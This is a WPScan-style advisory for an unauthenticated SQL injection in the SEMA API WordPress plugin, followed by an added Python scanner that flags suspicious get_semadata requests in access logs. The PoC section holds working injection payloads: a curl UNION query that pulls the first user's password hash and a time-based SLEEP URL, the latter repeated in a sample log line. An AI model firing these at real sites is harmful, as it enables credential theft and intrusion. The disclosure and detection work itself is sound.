wpvulndb | Cydave | WPVDB-ID:2A226AE8-7D9C-4F47-90AF-8A399A08F03F
Apr 13, 2022 - 12:00 a.m.

SEMA API < 4.02 - Unauthenticated SQLi

2022-04-13 00:00:00
cydave
wpscan.com
sema api
unauthenticated
sql injection
ajax action
exploitable
users
security vulnerability

EPSS: 0.002
Percentile: 57.6%

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL injections exploitable by unauthenticated users.

PoC

v < 3.64:
curl http://example.com/wp-admin/admin-ajax.php --data 'action=get_semadata&type=attributes&catid=-3 UNION ALL SELECT 1,2,3,(SELECT user_pass FROM wp_users WHERE ID = 1),5-- -'

v < 4.02:
https://example.com/wp-admin/admin-ajax.php?action=get_semadata&type=deleteattribute&catid=1&attrids=1) AND %28SELECT 42 FROM %28SELECT%28SLEEP%285%29%29%29b
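
A defender's check for the requests described above, as an added example that is not part of the original advisory or the plugin's code: it flags get_semadata AJAX calls whose catid or attrids value is not a numeric ID. The expected value shapes, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "get_semadata"
# Assumption: legitimate values are a numeric ID (catid) or a comma-separated
# list of numeric IDs (attrids). Adjust to how the site really uses the plugin.
EXPECTED = {
    "catid": re.compile(r"\d+\Z"),
    "attrids": re.compile(r"\d+(,\d+)*\Z"),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def bad_params(encoded):
    """Return get_semadata parameters whose decoded value is not a numeric ID."""
    params = parse_qs(encoded, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return {}
    return {
        name: value
        for name, pattern in EXPECTED.items()
        for value in params.get(name, [])
        if not pattern.match(value)
    }


def scan_access_log(lines):
    """Yield (line_number, offending_params) for requests worth triage."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is not None and url.path.endswith(AJAX_PATH):
            hits = bad_params(url.query)
            if hits:
                yield number, hits


# Constructed sample lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2022:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=get_semadata&type=attributes&catid=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [13/Apr/2022:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=get_semadata&type=deleteattribute&catid=1&attrids=1)%20AND%20%28SELECT%2042%20FROM%20%28SELECT%28SLEEP%285%29%29%29b HTTP/1.1" 200 2',
    '203.0.113.9 - - [13/Apr/2022:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&catid=abc HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    for number, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

bad_params also accepts a form-encoded POST body, which access logs normally omit, so the POST variant needs request-body logging or a WAF rule applying the same check.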
